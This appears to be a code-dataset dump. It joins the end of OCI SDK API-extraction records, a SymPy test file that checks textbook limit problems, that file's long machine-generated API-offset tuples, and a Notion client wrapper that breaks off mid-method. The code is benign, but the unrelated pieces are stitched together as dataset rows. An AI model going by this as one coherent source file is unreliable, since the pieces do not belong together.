| [((9062, 9087), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (9081, 9087), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((5437, 5509), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['availability_status', 'allowed_values'], {}), '(availability_status, allowed_values)\n', (5472, 5509), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((6480, 6546), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['platform_type', 'allowed_values'], {}), '(platform_type, allowed_values)\n', (6515, 6546), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((8865, 8930), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['install_type', 'allowed_values'], {}), '(install_type, allowed_values)\n', (8900, 8930), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')] |
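A minimal usage sketch of the model above, assuming the init_model_state_from_kwargs decorator applies keyword arguments through the property setters, as is usual in the OCI Python SDK; the field values are illustrative.
dims = ManagementAgentAggregationDimensions(
    availability_status="ACTIVE",
    platform_type="LINUX",
    version="210101.0101",
    has_plugins=True,
    install_type="AGENT",
)
print(dims.availability_status)   # "ACTIVE"
print(dims)                       # flat-dict repr via formatted_flat_dict(self)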
from sympy import (
limit,
Symbol,
oo,
sqrt,
Rational,
log,
exp,
cos,
sin,
tan,
pi,
asin,
together,
root,
S,
)
# Numbers listed with the tests refer to problem numbers in the book
# "Anti-demidovich, problemas resueltos, Ed. URSS"
x = Symbol("x")
def test_leadterm():
assert (3 + 2 * x ** (log(3) / log(2) - 1)).leadterm(x) == (3, 0)
def root3(x):
return root(x, 3)
def root4(x):
return root(x, 4)
def test_Limits_simple_0():
assert limit((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo) == 3 # 175
def test_Limits_simple_1():
assert limit((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo) == 1 # 172
assert limit(sqrt(x + 1) - sqrt(x), x, oo) == 0 # 179
assert (
limit((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)
== 8
) # Primjer 1
assert limit(x / root3(x ** 3 + 10), x, oo) == 1 # Primjer 2
assert limit((x + 1) ** 2 / (x ** 2 + 1), x, oo) == 1 # 181
def test_Limits_simple_2():
assert limit(1000 * x / (x ** 2 - 1), x, oo) == 0 # 182
assert limit((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo) is oo # 183
assert limit((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo) == 0 # 184
assert limit((2 * x ** 2 - 3 * x - 4) / sqrt(x ** 4 + 1), x, oo) == 2 # 186
assert limit((2 * x + 3) / (x + root3(x)), x, oo) == 2 # 187
assert limit(x ** 2 / (10 + x * sqrt(x)), x, oo) is oo # 188
assert limit(root3(x ** 2 + 1) / (x + 1), x, oo) == 0 # 189
assert limit(sqrt(x) / sqrt(x + sqrt(x + sqrt(x))), x, oo) == 1 # 190
def test_Limits_simple_3a():
a = Symbol("a")
# issue 3513
assert together(limit((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)) == (
a - 1
) / (
3 * a ** 2
) # 196
def test_Limits_simple_3b():
h = Symbol("h")
assert limit(((x + h) ** 3 - x ** 3) / h, h, 0) == 3 * x ** 2 # 197
assert limit((1 / (1 - x) - 3 / (1 - x ** 3)), x, 1) == -1 # 198
assert (
limit((sqrt(1 + x) - 1) / (root3(1 + x) - 1), x, 0) == Rational(3) / 2
) # Primer 4
assert limit((sqrt(x) - 1) / (x - 1), x, 1) == Rational(1) / 2 # 199
assert limit((sqrt(x) - 8) / (root3(x) - 4), x, 64) == 3 # 200
assert limit((root3(x) - 1) / (root4(x) - 1), x, 1) == Rational(4) / 3 # 201
assert (
limit((root3(x ** 2) - 2 * root3(x) + 1) / (x - 1) ** 2, x, 1)
== Rational(1) / 9
) # 202
def test_Limits_simple_4a():
a = Symbol("a")
assert limit((sqrt(x) - sqrt(a)) / (x - a), x, a) == 1 / (2 * sqrt(a)) # Primer 5
assert limit((sqrt(x) - 1) / (root3(x) - 1), x, 1) == Rational(3, 2) # 205
assert limit((sqrt(1 + x) - sqrt(1 - x)) / x, x, 0) == 1 # 207
assert limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo) == Rational(-5, 2) # 213
def test_limits_simple_4aa():
assert limit(x * (sqrt(x ** 2 + 1) - x), x, oo) == Rational(1) / 2 # 214
def test_Limits_simple_4b():
# issue 3511
assert limit(x - root3(x ** 3 - 1), x, oo) == 0 # 215
def test_Limits_simple_4c():
assert limit(log(1 + exp(x)) / x, x, -oo) == 0 # 267a
assert limit(log(1 + exp(x)) / x, x, oo) == 1 # 267b
def test_bounded():
assert limit(sin(x) / x, x, oo) == 0 # 216b
assert limit(x * sin(1 / x), x, 0) == 0 # 227a
def test_f1a():
# issue 3508:
assert limit((sin(2 * x) / x) ** (1 + x), x, 0) == 2 # Primer 7
def test_f1a2():
# issue 3509:
assert limit(((x - 1) / (x + 1)) ** x, x, oo) == exp(-2) # Primer 9
def test_f1b():
m = Symbol("m")
n = Symbol("n")
h = Symbol("h")
a = Symbol("a")
assert limit(sin(x) / x, x, 2) == sin(2) / 2 # 216a
assert limit(sin(3 * x) / x, x, 0) == 3 # 217
assert limit(sin(5 * x) / sin(2 * x), x, 0) == Rational(5, 2) # 218
assert limit(sin(pi * x) / sin(3 * pi * x), x, 0) == Rational(1, 3) # 219
assert limit(x * sin(pi / x), x, oo) == pi # 220
assert limit((1 - cos(x)) / x ** 2, x, 0) == S.Half # 221
assert limit(x * sin(1 / x), x, oo) == 1 # 227b
assert limit((cos(m * x) - cos(n * x)) / x ** 2, x, 0) == (
(n ** 2 - m ** 2) / 2
) # 232
assert limit((tan(x) - sin(x)) / x ** 3, x, 0) == S.Half # 233
assert limit((x - sin(2 * x)) / (x + sin(3 * x)), x, 0) == -Rational(1, 4) # 237
assert limit((1 - sqrt(cos(x))) / x ** 2, x, 0) == Rational(1, 4) # 239
assert limit((sqrt(1 + sin(x)) - sqrt(1 - sin(x))) / x, x, 0) == 1 # 240
assert limit((1 + h / x) ** x, x, oo) == exp(h) # Primer 9
assert limit((sin(x) - sin(a)) / (x - a), x, a) == cos(a) # 222, *176
assert limit((cos(x) - cos(a)) / (x - a), x, a) == -sin(a) # 223
assert limit((sin(x + h) - sin(x)) / h, h, 0) == cos(x) # 225
def test_f2a():
assert limit(((x + 1) / (2 * x + 1)) ** (x ** 2), x, oo) == 0 # Primer 8
def test_f2():
assert limit((sqrt(cos(x)) - root3(cos(x))) / (sin(x) ** 2), x, 0) == -Rational(
1, 12
) # *184
def test_f3():
a = Symbol("a")
# issue 3504
assert limit(asin(a * x) / x, x, 0) == a
| [
"sympy.sin",
"sympy.Symbol",
"sympy.cos",
"sympy.root",
"sympy.sqrt",
"sympy.limit",
"sympy.tan",
"sympy.log",
"sympy.exp",
"sympy.asin",
"sympy.Rational"
]
| [((297, 308), 'sympy.Symbol', 'Symbol', (['"""x"""'], {}), "('x')\n", (303, 308), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((429, 439), 'sympy.root', 'root', (['x', '(3)'], {}), '(x, 3)\n', (433, 439), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((467, 477), 'sympy.root', 'root', (['x', '(4)'], {}), '(x, 4)\n', (471, 477), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1656, 1667), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (1662, 1667), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1866, 1877), 'sympy.Symbol', 'Symbol', (['"""h"""'], {}), "('h')\n", (1872, 1877), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2518, 2529), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (2524, 2529), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3574, 3585), 'sympy.Symbol', 'Symbol', (['"""m"""'], {}), "('m')\n", (3580, 3585), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3594, 3605), 'sympy.Symbol', 'Symbol', (['"""n"""'], {}), "('n')\n", (3600, 3605), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3614, 3625), 'sympy.Symbol', 'Symbol', (['"""h"""'], {}), "('h')\n", (3620, 3625), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3634, 3645), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (3640, 3645), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((5020, 5031), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (5026, 5031), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((519, 582), 'sympy.limit', 'limit', (['((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x))', 'x', 'oo'], {}), '((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo)\n', (524, 582), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((636, 686), 'sympy.limit', 'limit', (['((x + 1) * (x + 2) * (x + 3) / x ** 3)', 'x', 'oo'], {}), '((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo)\n', (641, 686), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((779, 855), 'sympy.limit', 'limit', (['((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1))', 'x', 'oo'], {}), '((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)\n', (784, 855), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((965, 1006), 'sympy.limit', 'limit', (['((x + 1) ** 2 / (x ** 2 + 1))', 'x', 'oo'], {}), '((x + 1) ** 2 / (x ** 2 + 1), x, oo)\n', (970, 1006), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1060, 1097), 'sympy.limit', 'limit', (['(1000 * x / (x ** 2 - 1))', 'x', 'oo'], {}), '(1000 * x / (x ** 2 - 1), x, oo)\n', (1065, 1097), 
False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1121, 1169), 'sympy.limit', 'limit', (['((x ** 2 - 5 * x + 1) / (3 * x + 7))', 'x', 'oo'], {}), '((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo)\n', (1126, 1169), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1194, 1251), 'sympy.limit', 'limit', (['((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5))', 'x', 'oo'], {}), '((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo)\n', (1199, 1251), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1889, 1929), 'sympy.limit', 'limit', (['(((x + h) ** 3 - x ** 3) / h)', 'h', '(0)'], {}), '(((x + h) ** 3 - x ** 3) / h, h, 0)\n', (1894, 1929), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1962, 2005), 'sympy.limit', 'limit', (['(1 / (1 - x) - 3 / (1 - x ** 3))', 'x', '(1)'], {}), '(1 / (1 - x) - 3 / (1 - x ** 3), x, 1)\n', (1967, 2005), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2675, 2689), 'sympy.Rational', 'Rational', (['(3)', '(2)'], {}), '(3, 2)\n', (2683, 2689), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2822, 2837), 'sympy.Rational', 'Rational', (['(-5)', '(2)'], {}), '(-5, 2)\n', (2830, 2837), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3486, 3524), 'sympy.limit', 'limit', (['(((x - 1) / (x + 1)) ** x)', 'x', 'oo'], {}), '(((x - 1) / (x + 1)) ** x, x, oo)\n', (3491, 3524), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3528, 3535), 'sympy.exp', 'exp', (['(-2)'], {}), '(-2)\n', (3531, 3535), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3805, 3819), 'sympy.Rational', 'Rational', (['(5)', '(2)'], {}), '(5, 2)\n', (3813, 3819), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3884, 3898), 'sympy.Rational', 'Rational', (['(1)', '(3)'], {}), '(1, 3)\n', (3892, 3898), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4392, 4406), 'sympy.Rational', 'Rational', (['(1)', '(4)'], {}), '(1, 4)\n', (4400, 4406), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4504, 4534), 'sympy.limit', 'limit', (['((1 + h / x) ** x)', 'x', 'oo'], {}), '((1 + h / x) ** x, x, oo)\n', (4509, 4534), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4538, 4544), 'sympy.exp', 'exp', (['h'], {}), '(h)\n', (4541, 4544), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4612, 4618), 'sympy.cos', 'cos', (['a'], {}), '(a)\n', (4615, 4618), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4755, 4761), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4758, 4761), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, 
root, S\n'), ((4798, 4845), 'sympy.limit', 'limit', (['(((x + 1) / (2 * x + 1)) ** x ** 2)', 'x', 'oo'], {}), '(((x + 1) / (2 * x + 1)) ** x ** 2, x, oo)\n', (4803, 4845), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1705, 1764), 'sympy.limit', 'limit', (['((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3))', 'x', 'a'], {}), '((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)\n', (1710, 1764), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2097, 2108), 'sympy.Rational', 'Rational', (['(3)'], {}), '(3)\n', (2105, 2108), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2182, 2193), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2190, 2193), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2332, 2343), 'sympy.Rational', 'Rational', (['(4)'], {}), '(4)\n', (2340, 2343), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2450, 2461), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2458, 2461), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2932, 2943), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2940, 2943), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3684, 3690), 'sympy.sin', 'sin', (['(2)'], {}), '(2)\n', (3687, 3690), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4315, 4329), 'sympy.Rational', 'Rational', (['(1)', '(4)'], {}), '(1, 4)\n', (4323, 4329), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4688, 4694), 'sympy.sin', 'sin', (['a'], {}), '(a)\n', (4691, 4694), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4957, 4972), 'sympy.Rational', 'Rational', (['(1)', '(12)'], {}), '(1, 12)\n', (4965, 4972), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((716, 727), 'sympy.sqrt', 'sqrt', (['(x + 1)'], {}), '(x + 1)\n', (720, 727), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((730, 737), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (734, 737), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1308, 1324), 'sympy.sqrt', 'sqrt', (['(x ** 4 + 1)'], {}), '(x ** 4 + 1)\n', (1312, 1324), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1559, 1566), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1563, 1566), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2596, 2603), 'sympy.sqrt', 'sqrt', (['a'], {}), '(a)\n', (2600, 2603), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2782, 2806), 'sympy.sqrt', 'sqrt', (['(x ** 2 - 5 * x + 6)'], {}), '(x ** 2 - 5 * x + 6)\n', (2786, 2806), False, 'from sympy import limit, Symbol, oo, sqrt, 
Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3249, 3255), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (3252, 3255), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3302, 3312), 'sympy.sin', 'sin', (['(1 / x)'], {}), '(1 / x)\n', (3305, 3312), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3663, 3669), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (3666, 3669), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3720, 3730), 'sympy.sin', 'sin', (['(3 * x)'], {}), '(3 * x)\n', (3723, 3730), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3771, 3781), 'sympy.sin', 'sin', (['(5 * x)'], {}), '(5 * x)\n', (3774, 3781), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3784, 3794), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (3787, 3794), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3844, 3855), 'sympy.sin', 'sin', (['(pi * x)'], {}), '(pi * x)\n', (3847, 3855), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3858, 3873), 'sympy.sin', 'sin', (['(3 * pi * x)'], {}), '(3 * pi * x)\n', (3861, 3873), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3927, 3938), 'sympy.sin', 'sin', (['(pi / x)'], {}), '(pi / x)\n', (3930, 3938), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4044, 4054), 'sympy.sin', 'sin', (['(1 / x)'], {}), '(1 / x)\n', (4047, 4054), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((5066, 5077), 'sympy.asin', 'asin', (['(a * x)'], {}), '(a * x)\n', (5070, 5077), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2049, 2060), 'sympy.sqrt', 'sqrt', (['(1 + x)'], {}), '(1 + x)\n', (2053, 2060), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2149, 2156), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2153, 2156), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2223, 2230), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2227, 2230), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2548, 2555), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2552, 2555), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2558, 2565), 'sympy.sqrt', 'sqrt', (['a'], {}), '(a)\n', (2562, 2565), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2635, 2642), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2639, 2642), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2715, 2726), 'sympy.sqrt', 'sqrt', (['(1 + x)'], {}), '(1 + x)\n', (2719, 2726), False, 'from sympy import limit, Symbol, oo, 
sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2729, 2740), 'sympy.sqrt', 'sqrt', (['(1 - x)'], {}), '(1 - x)\n', (2733, 2740), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2899, 2915), 'sympy.sqrt', 'sqrt', (['(x ** 2 + 1)'], {}), '(x ** 2 + 1)\n', (2903, 2915), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3387, 3397), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (3390, 3397), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3982, 3988), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (3985, 3988), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4094, 4104), 'sympy.cos', 'cos', (['(m * x)'], {}), '(m * x)\n', (4097, 4104), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4107, 4117), 'sympy.cos', 'cos', (['(n * x)'], {}), '(n * x)\n', (4110, 4117), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4201, 4207), 'sympy.tan', 'tan', (['x'], {}), '(x)\n', (4204, 4207), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4210, 4216), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4213, 4216), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4273, 4283), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (4276, 4283), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4292, 4302), 'sympy.sin', 'sin', (['(3 * x)'], {}), '(3 * x)\n', (4295, 4302), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4575, 4581), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4578, 4581), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4584, 4590), 'sympy.sin', 'sin', (['a'], {}), '(a)\n', (4587, 4590), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4650, 4656), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4653, 4656), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4659, 4665), 'sympy.cos', 'cos', (['a'], {}), '(a)\n', (4662, 4665), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4720, 4730), 'sympy.sin', 'sin', (['(x + h)'], {}), '(x + h)\n', (4723, 4730), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4733, 4739), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4736, 4739), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4933, 4939), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4936, 4939), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1447, 1454), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1451, 1454), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, 
tan, pi, asin, together, root, S\n'), ((3118, 3124), 'sympy.exp', 'exp', (['x'], {}), '(x)\n', (3121, 3124), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3177, 3183), 'sympy.exp', 'exp', (['x'], {}), '(x)\n', (3180, 3183), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4364, 4370), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4367, 4370), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4905, 4911), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4908, 4911), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4921, 4927), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4924, 4927), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4441, 4447), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4444, 4447), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4460, 4466), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4463, 4466), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1587, 1594), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1591, 1594), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((358, 364), 'sympy.log', 'log', (['(3)'], {}), '(3)\n', (361, 364), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((367, 373), 'sympy.log', 'log', (['(2)'], {}), '(2)\n', (370, 373), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n')] |
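A standalone spot-check in the same style as the limit tests above; plain SymPy with no dependence on the test module, and the two limits chosen are illustrative.
from sympy import Symbol, exp, limit, oo, sin
x = Symbol("x")
assert limit(sin(x) / x, x, 0) == 1              # classic sin(x)/x limit at 0
assert limit((1 + 1 / x) ** x, x, oo) == exp(1)  # definition of e as a limit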
from notion.client import NotionClient
from notion.settings import Settings
class Context:
def __init__(self):
self.settings = Settings.from_file()
self._client = None
def get_client(self):
if not self._client:
self.settings.validate()
self._client = NotionClient(token_v2=self.settings.token, monitor=False)
return self._client
def update_settings(self, **kwargs):
